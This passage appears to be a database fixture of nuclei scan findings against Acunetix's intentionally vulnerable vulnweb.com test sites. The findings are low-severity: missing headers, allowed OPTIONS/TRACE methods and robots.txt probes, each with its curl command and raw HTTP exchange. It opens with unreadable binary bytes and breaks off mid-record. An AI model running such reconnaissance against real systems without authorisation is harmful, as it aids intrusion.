I��))H��\u0003a�\u001d��S\\�n\u001dYm$+)�刐 �\f\r�����u'��0��Ҝ�i!JP�,L�\u0001\u001aL��\u001fJ�|�,p�KRB^t\u0005����h;�j�Ͳ�ԧs��H�V��m�\u0001�����C8�,�!���;�bg:�\u0004�5�\u0018\u001a��.�\u001e����[�\u0002oqE�\u0013n��R\u001a �\u0002x}k�z\u0011�3��\nn��9n\u0002V�$���Q׈\u0002I܃�y& �\\�T��F�L@\u001e\u0002���^\u001e�k�u���D\u0018��+�^��\u0004�\u0019\u0013�Y�\u0015��\u001b[莩�ħi�\u000f�:���c�<\u000b�6\u0014d�*$����L��]�\tm����\u0002\u000e�R��b���)& ������q�@��]���U��2r�)L�����,=�ш\u000b�”�܅(\t��\u0015�\u0004�?:1w\u0017��ZP��%\t�`(���D��.� �q��!��Q���Y�w+��\u0012�,)X�a`6�\u0018��*x�1\u0014K�Z��\u0007�z�,��HS\u0004�)\u0006\f�G\u0001 ���\u0018��ıD���*ԭZ7��\u0015��\\=\t’�R-���\u0010]�h��]~T��e(Ő\u0005�p���\u0004\u0003�\u001a�*+2kZ�\u0015ZD\u0014\b�YB9V�p\u0002L�Ԥ��IWn��\u0016��m&@��L�37\u001a��RX)YЂ)�� \tN\u001eop�/�R��\u000eGF�DhF�6:�M2ѻ�[��\u0001SZ\u0012�Ǻ�C�Akv��Q\r�\u0018:�H��D*]�U�H\n�II\u0013\u001bH\u001e\u0015�nQn-`(����G\u0010�\u0013�v��\u000e����5a\u0017�D����u���x�\by���\u0002#��\u001bT��J�z�\u0007Q��c_�Y%L(%o\u0010hu�7\tZb\u0012�"u��H�Tn\\�ܽVT\u0015+�\n�\u0012\u000e��X�踸jє�\u001a�~�뫺ZD���c0\u0004\u001f�W�d.��Iq3m`��c9\u0019\u001bo��Y>C���-�%���d����'X'�O��[��n�ajNl��\u0001������f�:V��ʄ'a�km$�\u001e��S\u0002�y�\u0015\u0003A�_€a�.�\u0001�!#���J�I�N�����g �Guk�q`\u0010��-�/1\n'y��/4�25\u0006x�\u0014��\u0010u�\u001ba�`%:�G\u00045�3j��H8��\u0004��PU�'¶1|=~��[Z\u0003-���:�y���\u001d\u0012e-\u0002�$�� \rD�υ[�R�c\r-)!\u000f9�W08\b�|�\u0014�7VȄX&(ղ�s\u0002\b%*�\u001fޝ�\\e\u0018��Wn���O>:���&�\n\u001c$fȭ��@�\u0002� (F�)�˽Ir\u0017$�٣qg\n��\u0019�\u001b����T�\f\u001f�\u001c�6�����(��'.i�׉�����ʙ�;q��S���FRM�J�R\t�\u001b�\u001fÊ�*���0EJ���� \u000eU�\u0002�\tY�䟥[w�\n�Ӑ�P��W\t5��6�\u0001eAGI\u001a\u0011�UD)eq$�w�|�VR\u0012�\b�t"L�Ƅ��\t�ڛ��L�s\u001e4�|��\u0001\u0001�\u0001���J�2�G7*����&\u000e�\nT��<\u0012����vaCj����*p��\u001b�#�TEڒ������M\u000f=�B�'bi�)?\u00029�y-�.V���\u0004�́���]�:�\u0015��4����rgi֚�\u001f��U��:xҚ\u0007�\u0012�p�У�S�\rj�M���\u0006�x\u0011�R�O�uQ<�Y�\u0014��J�O}3�Q�懲\u0015�ҖH\u0003��L٥e!*�xD�a\t#:\t���J�\u0010��\u001c��&*�)"�(ˆ\u0014aL\u000b\u001bR��\u001a�\u0010A(<x��P�J�Uqrd�5#6�'�Z\r::��\u0010L�sN���"��w��²z�m*�4�7&\u0016gp5=��R��*A�P����h��ي�ՙ�*%i@$�`i�k!�!S\u001a�|�ҥ\\�\u000e��$\u0014�\u0002t�j\u00022�@m R�W�1f̤�����\u0017�\u0012��p��J�\bԵ(�cz������iR�PV�\f�y%m���\u001fqS%\u00031\u001e?*T�>E\u0011\u00039\u0011�>�j�\t�>�R�Q\u0001�N�\u0014�z�@ޕ*Ҹ2ˑ�\u00026\u001bTKBH:R�Q�\u001c[I))\u0012\u0007q�LI\u0001\u000f\u00109q�J���j��4���P��\\P\u0011=��Uf���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1013, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 112, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://www.vulnweb.com'", + "type": "http", + "http_url": "http://www.vulnweb.com", + "discovered_date": "2024-11-13T02:42:52.868Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: www.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:26 GMT\r\nEtag: W/"5f1fedf1-fb2"\r\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n<title>Acunetix Web Vulnerability Scanner - Test websites</title>\n<style type="text/css">\n<!--\n@import url("style.css");\n-->\n</style>\n</head>\n<body>\n\n\n<center>\n<br>\n\n<a href='https://www.acunetix.com/'><img src='acunetix-logo.png' border='0' alt="Acunetix website security"></a><br><br>\n<div>Vulnerable test websites for <a href='https://www.acunetix.com/vulnerability-scanner/'>Acunetix Web Vulnerability Scanner</a>.</div>\n\n<table id="one-column-emphasis" summary="Acunetix test websites" style="width:60%">\n <colgroup>\n \t<col>\n </colgroup>\n <thead>\n \t<tr style="font-size:14px">\n \t<th scope="col"><b>Name</b></th>\n <th scope="col"><b>URL</b></th>\n <th scope="col"><b>Technologies</b></th>\n\t\t\t<th scope="col"><b>Resources</b></th>\n </tr>\n </thead>\n <tbody>\n \t<tr style="font-size:14px">\n \t<td>SecurityTweets</td>\n <td><a href='http://testhtml5.vulnweb.com/'>http://testhtml5.vulnweb.com</a></td>\n <td>nginx, Python, Flask, CouchDB</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'>Review</a> Acunetix HTML5 scanner or <a href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuart</td>\n <td><a href='http://testphp.vulnweb.com/'>http://testphp.vulnweb.com</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'>Review</a> Acunetix PHP scanner or <a href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuforum</td>\n <td><a href='http://testasp.vulnweb.com/'>http://testasp.vulnweb.com</a></td>\n <td>IIS, ASP, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'>Review</a> Acunetix SQL scanner or <a href='https://www.acunetix.com/websitesecurity/sql-injection/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acublog</td>\n <td><a href='http://testaspnet.vulnweb.com/'>http://testaspnet.vulnweb.com</a></td>\n <td>IIS, ASP.NET, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'>Review</a> Acunetix network scanner or <a href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'>learn more</a> on the topic.</td>\n </tr>\n\t\t<tr style="font-size:14px">\n \t<td>REST API</td>\n <td><a href='http://rest.vulnweb.com/'>http://rest.vulnweb.com/</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>Review</a> Acunetix scanner or <a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>learn more</a> on the topic.</td>\n </tr>\n </tbody>\n</table>\n\n<div style="background-color:lightgray;width:60%;text-align:center;font-size:14px">\n<p style="padding-left:140px;padding-right:140px"><b>Warning</b>: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.</p>\n</div>\n</center>\n\n</body>\n</html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1014, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 1, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36' 'http://vulnweb.com'", + "type": "http", + "http_url": "http://vulnweb.com", + "discovered_date": "2024-11-13T02:42:53.142Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:26 GMT\r\nEtag: W/"5f1fedf1-fb2"\r\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n<title>Acunetix Web Vulnerability Scanner - Test websites</title>\n<style type="text/css">\n<!--\n@import url("style.css");\n-->\n</style>\n</head>\n<body>\n\n\n<center>\n<br>\n\n<a href='https://www.acunetix.com/'><img src='acunetix-logo.png' border='0' alt="Acunetix website security"></a><br><br>\n<div>Vulnerable test websites for <a href='https://www.acunetix.com/vulnerability-scanner/'>Acunetix Web Vulnerability Scanner</a>.</div>\n\n<table id="one-column-emphasis" summary="Acunetix test websites" style="width:60%">\n <colgroup>\n \t<col>\n </colgroup>\n <thead>\n \t<tr style="font-size:14px">\n \t<th scope="col"><b>Name</b></th>\n <th scope="col"><b>URL</b></th>\n <th scope="col"><b>Technologies</b></th>\n\t\t\t<th scope="col"><b>Resources</b></th>\n </tr>\n </thead>\n <tbody>\n \t<tr style="font-size:14px">\n \t<td>SecurityTweets</td>\n <td><a href='http://testhtml5.vulnweb.com/'>http://testhtml5.vulnweb.com</a></td>\n <td>nginx, Python, Flask, CouchDB</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'>Review</a> Acunetix HTML5 scanner or <a href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuart</td>\n <td><a href='http://testphp.vulnweb.com/'>http://testphp.vulnweb.com</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'>Review</a> Acunetix PHP scanner or <a href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuforum</td>\n <td><a href='http://testasp.vulnweb.com/'>http://testasp.vulnweb.com</a></td>\n <td>IIS, ASP, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'>Review</a> Acunetix SQL scanner or <a href='https://www.acunetix.com/websitesecurity/sql-injection/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acublog</td>\n <td><a href='http://testaspnet.vulnweb.com/'>http://testaspnet.vulnweb.com</a></td>\n <td>IIS, ASP.NET, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'>Review</a> Acunetix network scanner or <a href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'>learn more</a> on the topic.</td>\n </tr>\n\t\t<tr style="font-size:14px">\n \t<td>REST API</td>\n <td><a href='http://rest.vulnweb.com/'>http://rest.vulnweb.com/</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>Review</a> Acunetix scanner or <a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>learn more</a> on the topic.</td>\n </tr>\n </tbody>\n</table>\n\n<div style="background-color:lightgray;width:60%;text-align:center;font-size:14px">\n<p style="padding-left:140px;padding-right:140px"><b>Warning</b>: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.</p>\n</div>\n</center>\n\n</body>\n</html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1015, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/miscellaneous/clientaccesspolicy.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/clientaccesspolicy", + "template_id": "clientaccesspolicy", + "matcher_name": "", + "name": "Silverlight cross-domain policy", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/608.2.11 (KHTML, like Gecko) Version/9.1.2 Safari/608.2.11' 'http://testphp.vulnweb.com/clientaccesspolicy.xml'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/clientaccesspolicy.xml", + "discovered_date": "2024-11-13T02:43:26.580Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /clientaccesspolicy.xml HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/608.2.11 (KHTML, like Gecko) Version/9.1.2 Safari/608.2.11\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 307\r\nAccept-Ranges: bytes\r\nContent-Type: text/xml\r\nDate: Wed, 13 Nov 2024 02:43:26 GMT\r\nEtag: "5049b03d-133"\r\nLast-Modified: Fri, 07 Sep 2012 08:28:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n<?xml version="1.0" encoding="utf-8"?>\r\n<access-policy>\r\n\t<cross-domain-access>\r\n <!--\r\n\t\t<allow-from http-request-headers="*">\r\n\t\t\t<domain uri="*"/>\r\n\t\t</allow-from>\r\n --> \r\n\t\t<grant-to>\r\n\t\t\t<resource path="/" include-subpaths="true"/>\r\n\t\t</grant-to>\r\n\t</cross-domain-access>\r\n</access-policy>", + "is_llm_used": false, + "tags": [ + 18, + 17 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1016, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 76, + "endpoint": null, + "target_domain": 1, + "template": "http/miscellaneous/options-method.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/options-method", + "template_id": "options-method", + "matcher_name": "", + "name": "Allowed Options Method", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[\"OPTIONS, TRACE, GET, HEAD, POST\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'OPTIONS' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36 Edg/100.0.1185.29' 'http://testaspnet.vulnweb.com'", + "type": "http", + "http_url": "http://testaspnet.vulnweb.com", + "discovered_date": "2024-11-13T02:43:33.524Z", + "open_status": true, + "hackerone_report_id": null, + "request": "OPTIONS / HTTP/1.1\r\nHost: testaspnet.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36 Edg/100.0.1185.29\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nAllow: OPTIONS, TRACE, GET, HEAD, POST\r\nDate: Wed, 13 Nov 2024 02:43:29 GMT\r\nPublic: OPTIONS, TRACE, GET, HEAD, POST\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\nContent-Length: 0\r\n\r\n", + "is_llm_used": false, + "tags": [ + 18, + 17, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1017, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/miscellaneous/options-method.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/options-method", + "template_id": "options-method", + "matcher_name": "", + "name": "Allowed Options Method", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[\"OPTIONS, TRACE, GET, HEAD, POST\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'OPTIONS' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0' 'http://testasp.vulnweb.com'", + "type": "http", + "http_url": "http://testasp.vulnweb.com", + "discovered_date": "2024-11-13T02:43:33.874Z", + "open_status": true, + "hackerone_report_id": null, + "request": "OPTIONS / HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nAllow: OPTIONS, TRACE, GET, HEAD, POST\r\nDate: Wed, 13 Nov 2024 02:43:29 GMT\r\nPublic: OPTIONS, TRACE, GET, HEAD, POST\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\nContent-Length: 0\r\n\r\n", + "is_llm_used": false, + "tags": [ + 18, + 17, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1018, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/miscellaneous/options-method.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/options-method", + "template_id": "options-method", + "matcher_name": "", + "name": "Allowed Options Method", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[\"OPTIONS, TRACE, GET, HEAD, POST\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'OPTIONS' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50' 'http://testasp.vulnweb.com/%E2%80%93'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/%E2%80%93", + "discovered_date": "2024-11-13T02:43:34.257Z", + "open_status": true, + "hackerone_report_id": null, + "request": "OPTIONS /%E2%80%93 HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nAllow: OPTIONS, TRACE, GET, HEAD, POST\r\nDate: Wed, 13 Nov 2024 02:43:29 GMT\r\nPublic: OPTIONS, TRACE, GET, HEAD, POST\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\nContent-Length: 0\r\n\r\n", + "is_llm_used": false, + "tags": [ + 18, + 17, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1019, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/miscellaneous/options-method.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/options-method", + "template_id": "options-method", + "matcher_name": "", + "name": "Allowed Options Method", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[\"OPTIONS, TRACE, GET, HEAD, POST\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'OPTIONS' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.0 Safari/537.36 Edg/93.0.967.0' 'http://testasp.vulnweb.com/T'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/T", + "discovered_date": "2024-11-13T02:43:34.535Z", + "open_status": true, + "hackerone_report_id": null, + "request": "OPTIONS /T HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.0 Safari/537.36 Edg/93.0.967.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nAllow: OPTIONS, TRACE, GET, HEAD, POST\r\nDate: Wed, 13 Nov 2024 02:43:29 GMT\r\nPublic: OPTIONS, TRACE, GET, HEAD, POST\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\nContent-Length: 0\r\n\r\n", + "is_llm_used": false, + "tags": [ + 18, + 17, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1020, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/miscellaneous/robots-txt-endpoint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/robots-txt-endpoint", + "template_id": "robots-txt-endpoint", + "matcher_name": "", + "name": "robots.txt endpoint prober", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:99.0) Gecko/20100101 Firefox/99.0' 'http://testasp.vulnweb.com/robots.txt'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/robots.txt", + "discovered_date": "2024-11-13T02:43:34.816Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /robots.txt HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:99.0) Gecko/20100101 Firefox/99.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 13\r\nAccept-Ranges: bytes\r\nContent-Type: text/plain\r\nDate: Wed, 13 Nov 2024 02:43:30 GMT\r\nEtag: "3629faa394d51:0"\r\nLast-Modified: Mon, 06 May 2019 12:45:52 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\nUser-agent: *", + "is_llm_used": false, + "tags": [ + 18, + 17, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1021, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/miscellaneous/robots-txt-endpoint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/robots-txt-endpoint", + "template_id": "robots-txt-endpoint", + "matcher_name": "", + "name": "robots.txt endpoint prober", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36' 'http://testasp.vulnweb.com/robots.txt'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/robots.txt", + "discovered_date": "2024-11-13T02:43:35.102Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /robots.txt HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 13\r\nAccept-Ranges: bytes\r\nContent-Type: text/plain\r\nDate: Wed, 13 Nov 2024 02:43:30 GMT\r\nEtag: "3629faa394d51:0"\r\nLast-Modified: Mon, 06 May 2019 12:45:52 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\nUser-agent: *", + "is_llm_used": false, + "tags": [ + 18, + 17, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1022, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 76, + "endpoint": null, + "target_domain": 1, + "template": "http/miscellaneous/robots-txt-endpoint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/robots-txt-endpoint", + "template_id": "robots-txt-endpoint", + "matcher_name": "", + "name": "robots.txt endpoint prober", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0 OS/10.0.22000' 'http://testaspnet.vulnweb.com/robots.txt'", + "type": "http", + "http_url": "http://testaspnet.vulnweb.com/robots.txt", + "discovered_date": "2024-11-13T02:43:35.441Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /robots.txt HTTP/1.1\r\nHost: testaspnet.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 